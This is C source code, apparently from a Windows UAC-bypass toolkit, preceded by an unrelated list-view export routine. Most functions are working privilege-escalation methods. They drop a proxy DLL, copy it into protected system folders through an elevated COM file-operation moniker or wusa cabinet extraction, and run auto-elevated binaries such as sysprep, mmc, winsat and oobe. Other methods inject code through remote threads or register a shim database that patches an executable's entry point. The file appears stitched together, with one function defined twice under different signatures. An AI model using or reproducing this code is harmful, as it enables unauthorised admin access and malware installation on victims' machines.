/*
* SdtSaveListToFile
*
* Purpose:
*
* Dump table to the selected file
*
*/
VOID SdtSaveListToFile(
_In_ HWND hwndDlg
)
{
WCHAR ch;
INT BufferSize = 0;
INT numitems;
INT row, subitem;
SIZE_T sz, k;
LPWSTR pItem = NULL;
HCURSOR hSaveCursor;
HCURSOR hHourGlass;
WCHAR szTempBuffer[MAX_PATH + 1];
RtlSecureZeroMemory(szTempBuffer, sizeof(szTempBuffer));
_strcpy(szTempBuffer, TEXT("list.txt"));
if (supSaveDialogExecute(hwndDlg, (LPWSTR)&szTempBuffer, TEXT("Text files\0*.txt\0\0"))) {
hHourGlass = LoadCursorW(NULL, IDC_WAIT);
ch = (WCHAR)0xFEFF;
supWriteBufferToFile(szTempBuffer, &ch, sizeof(WCHAR), FALSE, FALSE);
SetCapture(hwndDlg);
hSaveCursor = SetCursor(hHourGlass);
numitems = ListView_GetItemCount(SdtDlgContext.ListView);
for (row = 0; row < numitems; row++) {
output[0] = 0;
for (subitem = 0; subitem < SdtDlgContext.lvColumnCount; subitem++) {
sz = 0;
pItem = supGetItemText(SdtDlgContext.ListView, row, subitem, &sz);
if (pItem) {
_strcat(output, pItem);
HeapFree(GetProcessHeap(), 0, pItem);
}
if (subitem == 1) {
for (k = 54; k > sz / sizeof(WCHAR); k--) {
_strcat(output, TEXT(" "));
}
}
else {
_strcat(output, TEXT("\t"));
}
}
_strcat(output, L"\r\n");
BufferSize = (INT)_strlen(output);
supWriteBufferToFile(szTempBuffer, output, BufferSize * sizeof(WCHAR), FALSE, TRUE);
}
SetCursor(hSaveCursor);
ReleaseCapture();
}
}
/*
* ucmStandardAutoElevation2
*
* Purpose:
*
* Bypass UAC by abusing appinfo g_lpAutoApproveEXEList
*
* UAC contain whitelist of trusted fusion processes with only names and no other special restrictions
* Most of them unknown shit and list does not properly handled by system itself, use this fact.
*
*/
BOOL ucmStandardAutoElevation2(
CONST PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
WCHAR SourceFilePathAndName[MAX_PATH + 1];
WCHAR DestinationFilePathAndName[MAX_PATH + 1];
do {
//source filename of dll
RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
_strcpy(SourceFilePathAndName, g_ctx.szTempDirectory);
_strcat(SourceFilePathAndName, UNBCL_DLL);
if (!supWriteBufferToFile(SourceFilePathAndName, ProxyDll, ProxyDllSize)) {
break;
}
//copy %temp\unbcl.dll -> system32\unbcl.dll
if (!ucmMasqueradedMoveFileCOM(SourceFilePathAndName, g_ctx.szSystemDirectory)) {
break;
}
//source filename of process
RtlSecureZeroMemory(SourceFilePathAndName, sizeof(SourceFilePathAndName));
_strcpy(SourceFilePathAndName, g_ctx.szSystemDirectory);
_strcat(SourceFilePathAndName, SYSPREP_DIR);
_strcat(SourceFilePathAndName, SYSPREP_EXE);
RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
_strcpy(DestinationFilePathAndName, g_ctx.szTempDirectory);
_strcat(DestinationFilePathAndName, OOBE_EXE);
//system32\sysprep\sysprep.exe -> temp\oobe.exe
if (!CopyFile(SourceFilePathAndName, DestinationFilePathAndName, FALSE)) {
break;
}
//temp\oobe.exe -> system32\oobe.exe
if (!ucmMasqueradedMoveFileCOM(DestinationFilePathAndName, g_ctx.szSystemDirectory)) {
break;
}
RtlSecureZeroMemory(DestinationFilePathAndName, sizeof(DestinationFilePathAndName));
_strcpy(DestinationFilePathAndName, g_ctx.szSystemDirectory);
_strcat(DestinationFilePathAndName, OOBE_EXE);
bResult = supRunProcess(DestinationFilePathAndName, NULL);
} while (cond);
return bResult;
}
/*
* ucmCreateCabinetForSingleFile
*
* Purpose:
*
* Build cabinet for usage in methods where required 1 file.
*
*/
BOOL ucmCreateCabinetForSingleFile(
LPWSTR lpSourceDll,
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
CABDATA *Cabinet = NULL;
LPWSTR lpFileName;
WCHAR szMsuFileName[MAX_PATH * 2];
if ((ProxyDll == NULL) || (ProxyDllSize == 0)) {
return FALSE;
}
do {
//drop proxy dll
if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
break;
}
//build cabinet
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
Cabinet = cabCreate(szMsuFileName);
if (Cabinet == NULL)
break;
lpFileName = _filename(lpSourceDll);
//put file without compression
bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
cabClose(Cabinet);
} while (cond);
return bResult;
}
/*
* ucmH1N1Method
*
* Purpose:
*
* Bypass UAC by abusing OOBE.exe backdoor hardcoded in appinfo.dll
*
*/
BOOL ucmH1N1Method(
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
DWORD c;
HANDLE hProcess = NULL, hRemoteThread = NULL;
HINSTANCE selfmodule = GetModuleHandle(NULL);
PIMAGE_DOS_HEADER pdosh = (PIMAGE_DOS_HEADER)selfmodule;
PIMAGE_FILE_HEADER fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
PIMAGE_OPTIONAL_HEADER opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));
LPVOID remotebuffer = NULL, newEp, newDp;
SIZE_T NumberOfBytesWritten = 0;
PELOAD_PARAMETERS_4 elvpar = &g_ElevParamsH1N1;
LPVOID elevproc = ucmElevatedLaunchProc;
WCHAR szBuffer[MAX_PATH * 2];
WCHAR szDest[MAX_PATH + 1];
WCHAR szSource[MAX_PATH + 1];
if (
(ProxyDll == NULL) ||
(ProxyDllSize == 0)
)
{
return bResult;
}
do {
//put Fubuki dll as netutils to %temp%
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy_w(szBuffer, TEMPDIR);
_strcat_w(szBuffer, L"netutils.dll");
RtlSecureZeroMemory(szSource, sizeof(szSource));
if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
break;
}
if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
OutputDebugString(TEXT("[UCM] Failed to drop dll"));
break;
}
else {
OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
}
//copy dll to wbem target folder
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (ExpandEnvironmentStringsW(WBEMDIR,
szBuffer, MAX_PATH) == 0)
{
break;
}
//note: uacmAutoElevateCopyFile uses injection to explorer.exe
bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
if (!bResult) {
break;
}
//copy 1st stage target process
RtlSecureZeroMemory(szSource, sizeof(szSource));
if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\credwiz.exe",
szSource, MAX_PATH) == 0)
{
break;
}
RtlSecureZeroMemory(szDest, sizeof(szDest));
if (ExpandEnvironmentStrings(L"%temp%\\oobe.exe",
szDest, MAX_PATH) == 0)
{
break;
}
if (!CopyFile(szSource, szDest, FALSE)) {
break;
}
bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
if (!bResult) {
break;
}
//setup basic shellcode routines
RtlSecureZeroMemory(&g_ElevParamsH1N1, sizeof(g_ElevParamsH1N1));
elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ldp.hShell32, "ShellExecuteExW");
elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ldp.hKernel32, "WaitForSingleObject");
elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ldp.hKernel32, "CloseHandle");
//set shellcode 2nd stage target process
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy_w(elvpar->szTargetApp, g_ldp.szSystemDirectory); //c:\windows\system32\wbem\oobe.exe
_strcat_w(elvpar->szTargetApp, L"\\wbem\\oobe.exe");
_strcpy_w(elvpar->szVerb, L"runas");
_strcpy_w(szBuffer, g_ldp.szSystemDirectory); //c:\windows\system32\credwiz.exe
_strcat_w(szBuffer, L"\\credwiz.exe");
//run 1st stage target process
hProcess = supRunProcessEx(szBuffer, NULL, NULL);
if (hProcess == NULL) {
OutputDebugString(TEXT("[UCM] Cannot open target process."));
break;
}
remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remotebuffer == NULL) {
OutputDebugString(TEXT("[UCM] Cannot allocate memory in target process."));
break;
}
if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) {
OutputDebugString(TEXT("[UCM] Cannot write to the target process memory."));
break;
}
newEp = (char *)remotebuffer + ((char *)elevproc - (char *)selfmodule);
newDp = (char *)remotebuffer + ((char *)elvpar - (char *)selfmodule);
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c);
bResult = (hRemoteThread != NULL);
if (bResult) {
WaitForSingleObject(hRemoteThread, INFINITE);
CloseHandle(hRemoteThread);
}
} while (cond);
if (hProcess != NULL) {
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
return bResult;
}
/*
* ucmMMCMethod
*
* Purpose:
*
* Bypass UAC by abusing MMC.exe backdoor hardcoded in appinfo.dll
*
*/
BOOL ucmMMCMethod(
LPWSTR lpTargetDll,
PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL bResult = FALSE, cond = FALSE;
WCHAR szSource[MAX_PATH + 1];
WCHAR szDest[MAX_PATH + 1];
WCHAR szBuffer[MAX_PATH + 1];
if (
(ProxyDll == NULL) ||
(ProxyDllSize == 0) ||
(lpTargetDll == NULL)
)
{
return bResult;
}
if (_strlen_w(lpTargetDll) > 100) {
return bResult;
}
do {
//put target dll
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy_w(szBuffer, TEMPDIR);
_strcat_w(szBuffer, lpTargetDll);
//expand string for proxy dll
RtlSecureZeroMemory(szSource, sizeof(szSource));
if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
break;
}
//write proxy dll to disk
if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
OutputDebugString(TEXT("[UCM] Failed to drop dll"));
break;
}
else {
OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
}
//expand string for target dir
RtlSecureZeroMemory(szDest, sizeof(szDest));
if (ExpandEnvironmentStringsW(SYSTEMROOTDIR,
szDest, MAX_PATH) == 0)
{
break;
}
//drop fubuki to system32
bResult = ucmAutoElevateCopyFile(szSource, szDest);
if (!bResult) {
break;
}
//run mmc console
//because of mmc harcoded backdoor uac will autoelevate mmc with valid and trusted MS command
//event viewer will attempt to load not existing dll, so we will give him our little friend
bResult = supRunProcess(L"mmc.exe", L"eventvwr.msc");
} while (cond);
return bResult;
}
/*
* ucmWinSATMethod
*
* Purpose:
*
* Acquire elevation through abusing APPINFO.DLL whitelisting model logic and wusa installer/IFileOperation autoelevation.
* Slightly modified target and proxydll can work almost with every autoelevated/whitelisted application.
* This method uses advantage of wusa to write to the protected folders, but can be adapted to IFileOperation too.
* WinSAT used for demonstration purposes only.
*
*/
BOOL ucmWinSATMethod(
LPWSTR lpTargetDll,
PVOID ProxyDll,
DWORD ProxyDllSize,
BOOL UseWusa
)
{
BOOL bResult = FALSE, cond = FALSE;
CABDATA *Cabinet = NULL;
WCHAR szSource[MAX_PATH + 1];
WCHAR szDest[MAX_PATH + 1];
WCHAR szBuffer[MAX_PATH + 1];
if (
(ProxyDll == NULL) ||
(ProxyDllSize == 0) ||
(lpTargetDll == NULL)
)
{
return bResult;
}
if (_strlen_w(lpTargetDll) > 100) {
return bResult;
}
RtlSecureZeroMemory(szSource, sizeof(szSource));
RtlSecureZeroMemory(szDest, sizeof(szDest));
do {
if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\winsat.exe",
szSource, MAX_PATH) == 0)
{
break;
}
if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
szDest, MAX_PATH) == 0)
{
break;
}
// Copy winsat to temp directory
if (!CopyFile(szSource, szDest, FALSE)) {
break;
}
//put target dll
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy_w(szBuffer, TEMPDIR);
_strcat_w(szBuffer, lpTargetDll);
//expand string for proxy dll
RtlSecureZeroMemory(szSource, sizeof(szSource));
if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
break;
}
//write proxy dll to disk
if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
OutputDebugString(TEXT("[UCM] Failed to drop dll"));
break;
}
else {
OutputDebugStringW(TEXT("[UCM] Dll dropped successfully"));
}
//
// Two options: use wusa installer or IFileOperation
//
if ( UseWusa ) {
//build cabinet
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (ExpandEnvironmentStringsW(T_MSUPACKAGE_NAME,
szBuffer, MAX_PATH) == 0)
{
break;
}
Cabinet = cabCreate(szBuffer);
if (Cabinet) {
//expand string for winsat.exe
if (ExpandEnvironmentStrings(L"%temp%\\winsat.exe",
szDest, MAX_PATH) == 0)
{
break;
}
//put proxy dll inside cabinet
cabAddFile(Cabinet, szSource, lpTargetDll);
//put winsat.exe
cabAddFile(Cabinet, szDest, L"winsat.exe");
cabClose(Cabinet);
Cabinet = NULL;
}
else {
OutputDebugString(TEXT("[UCM] Error creating cab archive"));
break;
}
//extract package
ucmWusaExtractPackage(T_WINSAT_CMDLINE);
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) {
break;
}
bResult = supRunProcess(szBuffer, NULL);
}
else {
//wusa extract banned, switch to IFileOperation.
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (ExpandEnvironmentStringsW(M1W7_TARGETDIR,
szBuffer, MAX_PATH) == 0)
{
break;
}
bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
if (!bResult) {
break;
}
bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
if (!bResult) {
break;
}
Sleep(0);
//run winsat
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0) {
break;
}
bResult = supRunProcess(szBuffer, NULL);
//cleanup of the above files must be done by payload code
}
} while (cond);
if (Cabinet) {
cabClose(Cabinet);
}
//remove trash from %temp%
if (szDest[0] != 0) {
DeleteFileW(szDest);
}
if (szSource[0] != 0) {
DeleteFileW(szSource);
}
return bResult;
}
/*
* ucmStandardAutoElevation
*
* Purpose:
*
* Leo Davidson AutoElevation method with derivatives.
*
* M1W7 - Original Leo Davidson concept.
* M1W8 - Windows 8.1 adapted M1W7 (bypassing sysprep embedded manifest dlls redirection).
* M1W7T - Leo Davidson concept with different target dll, used by Win32/Tilon.
* M1W10 - Windows 10 adapter M1W7.
* M1WALL - WinNT/Pitou derivative from Leo Davidson concept.
*
*/
BOOL ucmStandardAutoElevation(
DWORD dwType,
CONST PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
HINSTANCE hKrnl, hOle32, hShell32;
LPWSTR lpSourceDll, lpTargetDir, lpTargetProcess;
WCHAR szBuffer[MAX_PATH + 1];
switch (dwType) {
case METHOD_SYSPREP1:
lpSourceDll = M1W7_SOURCEDLL;
lpTargetDir = M1W7_TARGETDIR;
lpTargetProcess = M1W7_TARGETPROCESS;
break;
case METHOD_SYSPREP2:
lpSourceDll = M1W8_SOURCEDLL;
lpTargetDir = M1W7_TARGETDIR;
lpTargetProcess = M1W7_TARGETPROCESS;
break;
case METHOD_SYSPREP3:
lpSourceDll = M1W10_SOURCEDLL;
lpTargetDir = M1W7_TARGETDIR;
lpTargetProcess = M1W7_TARGETPROCESS;
break;
case METHOD_OOBE:
lpSourceDll = M1WALL_SOURCEDLL;
lpTargetDir = M1WALL_TARGETDIR;
lpTargetProcess = M1WALL_TARGETPROCESS;
break;
case METHOD_TILON:
lpSourceDll = M1W7T_SOURCEDLL;
lpTargetDir = M1W7_TARGETDIR;
lpTargetProcess = M1W7_TARGETPROCESS;
break;
default:
return FALSE;
}
do {
// load/reference required dlls
hKrnl = GetModuleHandle(KERNEL32DLL);
hOle32 = GetModuleHandle(OLE32DLL);
if (hOle32 == NULL) {
hOle32 = LoadLibrary(OLE32DLL);
if (hOle32 == NULL) {
break;
}
}
hShell32 = GetModuleHandle(SHELL32DLL);
if (hShell32 == NULL) {
hShell32 = LoadLibrary(SHELL32DLL);
if (hShell32 == NULL) {
break;
}
}
//source filename
if (ExpandEnvironmentStringsW(lpSourceDll,
g_ElevParams.SourceFilePathAndName, MAX_PATH) == 0)
{
break;
}
OutputDebugStringW(g_ElevParams.SourceFilePathAndName);
if (!supWriteBufferToFile(g_ElevParams.SourceFilePathAndName,
ProxyDll, ProxyDllSize))
{
break;
}
//dest directory
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy_w(szBuffer, lpTargetDir);
if (ExpandEnvironmentStringsW(szBuffer,
g_ElevParams.DestinationDir, MAX_PATH) == 0)
{
break;
}
OutputDebugStringW(g_ElevParams.DestinationDir);
//target
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy_w(szBuffer, lpTargetProcess);
if (ExpandEnvironmentStringsW(szBuffer,
g_ElevParams.ExePathAndName, MAX_PATH) == 0)
{
break;
}
OutputDebugStringW(g_ElevParams.ExePathAndName);
//elevation moniker
_strcpy_w(g_ElevParams.EleMoniker, L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}");
g_ElevParams.xIID = IID_IFileOperation;
g_ElevParams.xIID_IShellItem = IID_IShellItem;
g_ElevParams.xCLSID = CLSID_FileOperation;
g_ElevParams.xCoInitialize = (pfnCoInitialize)GetProcAddress(hOle32, "CoInitialize");
g_ElevParams.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(hOle32, "CoCreateInstance");
g_ElevParams.xCoGetObject = (pfnCoGetObject)GetProcAddress(hOle32, "CoGetObject");
g_ElevParams.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(hOle32, "CoUninitialize");
g_ElevParams.xSHCreateItemFromParsingName = (pfnSHCreateItemFromParsingName)GetProcAddress(hShell32, "SHCreateItemFromParsingName");
g_ElevParams.xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(hShell32, "ShellExecuteExW");
g_ElevParams.xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(hKrnl, "WaitForSingleObject");
g_ElevParams.xCloseHandle = (pfnCloseHandle)GetProcAddress(hKrnl, "CloseHandle");
bResult = ucmInjectExplorer(&g_ElevParams, ucmElevatedLoadProc);
} while (cond);
return bResult;
}
/*
* ucmShimPatch
*
* Purpose:
*
* Build, register shim patch database and execute target app with forced Entry Point Override.
* Aside from UAC bypass this is also dll injection technique.
*
*/
BOOL ucmShimPatch(
CONST PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL bResult = FALSE, cond = FALSE;
PDB hpdb;
GUID dbGUID, exeGUID;
WCHAR szTempDirectory[MAX_PATH * 2];
WCHAR szShimDbPath[MAX_PATH * 2];
WCHAR szSdbinstPath[MAX_PATH * 2];
WCHAR szSystemDirectory[MAX_PATH];
DWORD indexid = MAXDWORD, sz, epRVA = 0;
TAGID dbrf, libref, patchref, exeref, matchfileref, patchfileref;
PBYTE tmp;
PPATCHBITS patchbits;
RtlSecureZeroMemory(szSdbinstPath, sizeof(szSdbinstPath));
RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
do {
if (!GetSystemDirectoryW(szSystemDirectory, MAX_PATH)) {
break;
}
wsprintfW(szSdbinstPath, SHIM_SDBINSTALLER, szSystemDirectory);
if (CoCreateGuid(&dbGUID) != S_OK) {
break;
}
if (CoCreateGuid(&exeGUID) != S_OK) {
break;
}
RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
if (!GetTempPathW(MAX_PATH, szTempDirectory)) {
break;
}
// drop Fubuki
RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
wsprintfW(szShimDbPath, L"%wsr3.dll", szTempDirectory);
if (!supWriteBufferToFile(szShimDbPath, ProxyDll, ProxyDllSize))
{
break;
}
RtlSecureZeroMemory(szShimDbPath, sizeof(szShimDbPath));
wsprintfW(szShimDbPath, L"%wsamuzani.sdb", szTempDirectory);
hpdb = SdbCreateDatabase(szShimDbPath, DOS_PATH);
if (hpdb == NULL) {
break;
}
if (!SdbDeclareIndex(hpdb, TAG_EXE, TAG_NAME, 1, TRUE, &indexid)) {
break;
}
if (!SdbStartIndexing(hpdb, indexid)) {
break;
}
SdbStopIndexing(hpdb, indexid);
SdbCommitIndexes(hpdb);
// begin DATABASE {
dbrf = SdbBeginWriteListTag(hpdb, TAG_DATABASE);
if (!SdbWriteStringTag(hpdb, TAG_NAME, L"amuzani")) {
break;
}
SdbWriteBinaryTag(hpdb, TAG_DATABASE_ID, (PBYTE)&dbGUID, sizeof(GUID));
SdbWriteDWORDTag(hpdb, TAG_OS_PLATFORM, 0x1); //<- win32
// begin LIBRARY {
libref = SdbBeginWriteListTag(hpdb, TAG_LIBRARY);
patchref = SdbBeginWriteListTag(hpdb, TAG_PATCH); // begin LIBRARY-PATCH
SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);
// query EP RVA for target
RtlSecureZeroMemory(szTempDirectory, sizeof(szTempDirectory));
wsprintfW(szTempDirectory, L"%ws\\%ws", szSystemDirectory, SHIMPATCH_EXENAME);
epRVA = supQueryEntryPointRVA(szTempDirectory);
if (epRVA == 0) {
break;
}
tmp = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 32 * 1024);
if (tmp != NULL) {
patchbits = (PPATCHBITS)tmp;
sz = 0;
patchbits->Opcode = PATCH_REPLACE;
patchbits->RVA = epRVA;
_strcpy_w(patchbits->ModuleName, SHIMPATCH_EXENAME);
supCopyMemory((char *)&patchbits->Pattern, sizeof(patchcode32), patchcode32, sizeof(patchcode32));
patchbits->PatternSize = sizeof(patchcode32);
patchbits->ActionSize = sizeof(PATCHBITS) + patchbits->PatternSize;
sz += patchbits->ActionSize;
SdbWriteBinaryTag(hpdb, TAG_PATCH_BITS, tmp, sz);
HeapFree(GetProcessHeap(), 0, tmp);
}
SdbEndWriteListTag(hpdb, patchref); // end LIBRARY-PATCH
// end LIBRARY
SdbEndWriteListTag(hpdb, libref);
SdbStartIndexing(hpdb, indexid);
// begin EXE {
exeref = SdbBeginWriteListTag(hpdb, TAG_EXE);
SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
SdbWriteStringTag(hpdb, TAG_APP_NAME, SHIMPATCH_EXENAME);
SdbWriteBinaryTag(hpdb, TAG_EXE_ID, (PBYTE)&exeGUID, sizeof(GUID));
// begin MATCH {
matchfileref = SdbBeginWriteListTag(hpdb, TAG_MATCHING_FILE);
SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_EXENAME);
SdbWriteStringTag(hpdb, TAG_COMPANY_NAME, SHIMPATCH_MSFTFULL);
SdbEndWriteListTag(hpdb, matchfileref); // } end MATCH
patchfileref = SdbBeginWriteListTag(hpdb, TAG_PATCH_REF);
SdbWriteStringTag(hpdb, TAG_NAME, SHIMPATCH_BINARYNAME);
SdbWriteDWORDTag(hpdb, TAG_PATCH_TAGID, patchref);
SdbEndWriteListTag(hpdb, patchfileref);
SdbEndWriteListTag(hpdb, exeref); // } end EXE
// } end DATABASE
SdbEndWriteListTag(hpdb, dbrf);
SdbCloseDatabaseWrite(hpdb);
// Register db and run target.
bResult = ucmRegisterAndRunTarget(szSystemDirectory, szSdbinstPath, szShimDbPath, L"%ws\\iscsicli.exe", TRUE);
} while (cond);
return bResult;
}
/*
* ucmStandardAutoElevation
*
* Purpose:
*
* Leo Davidson AutoElevation method with derivatives.
*
* UacMethodSysprep1 - Original Leo Davidson concept.
* UacMethodSysprep2 - Windows 8.1 adapted UacMethodSysprep1 (bypassing sysprep embedded manifest dlls redirection).
* UacMethodTilon - Leo Davidson concept with different target dll, used by Win32/Tilon.
* UacMethodSysprep3 - Windows 10 TH1 adapted UacMethodSysprep1.
* UacMethodOobe - WinNT/Pitou derivative from Leo Davidson concept.
*
*/
BOOL ucmStandardAutoElevation(
UACBYPASSMETHOD Method,
CONST PVOID ProxyDll,
DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
WCHAR szSourceDll[MAX_PATH * 2];
WCHAR szTargetDir[MAX_PATH * 2];
WCHAR szTargetProcess[MAX_PATH * 2];
_strcpy(szSourceDll, g_ctx.szTempDirectory);
_strcpy(szTargetDir, g_ctx.szSystemDirectory);
_strcpy(szTargetProcess, g_ctx.szSystemDirectory);
switch (Method) {
case UacMethodSysprep1:
//%temp%\cryptbase.dll
_strcat(szSourceDll, CRYPTBASE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;
case UacMethodSysprep2:
//%temp\\shcore.dll
_strcat(szSourceDll, SHCORE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;
case UacMethodSysprep3:
//%temp%\dbgcore.dll
_strcat(szSourceDll, DBGCORE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;
case UacMethodOobe:
//%temp%\wdscore.dll
_strcat(szSourceDll, WDSCORE_DLL);
//%systemroot%\system32\oobe\"
_strcat(szTargetDir, L"oobe\\");
//%systemroot%\system32\oobe\setupsqm.exe
_strcat(szTargetProcess, SETUPSQM_EXE);
break;
case UacMethodTilon:
//%temp%\ActionQueue.dll
_strcat(szSourceDll, ACTIONQUEUE_DLL);
//%systemroot%\system32\sysprep
_strcat(szTargetDir, SYSPREP_DIR);
//%systemroot%\system32\sysprep\sysprep.exe
_strcat(szTargetProcess, SYSPREP_DIR);
_strcat(szTargetProcess, SYSPREP_EXE);
break;
default:
return FALSE;
}
do {
if (!supWriteBufferToFile(szSourceDll, ProxyDll, ProxyDllSize))
break;
if (!ucmMasqueradedMoveFileCOM(szSourceDll, szTargetDir))
break;
bResult = supRunProcess(szTargetProcess, NULL);
} while (cond);
return bResult;
}
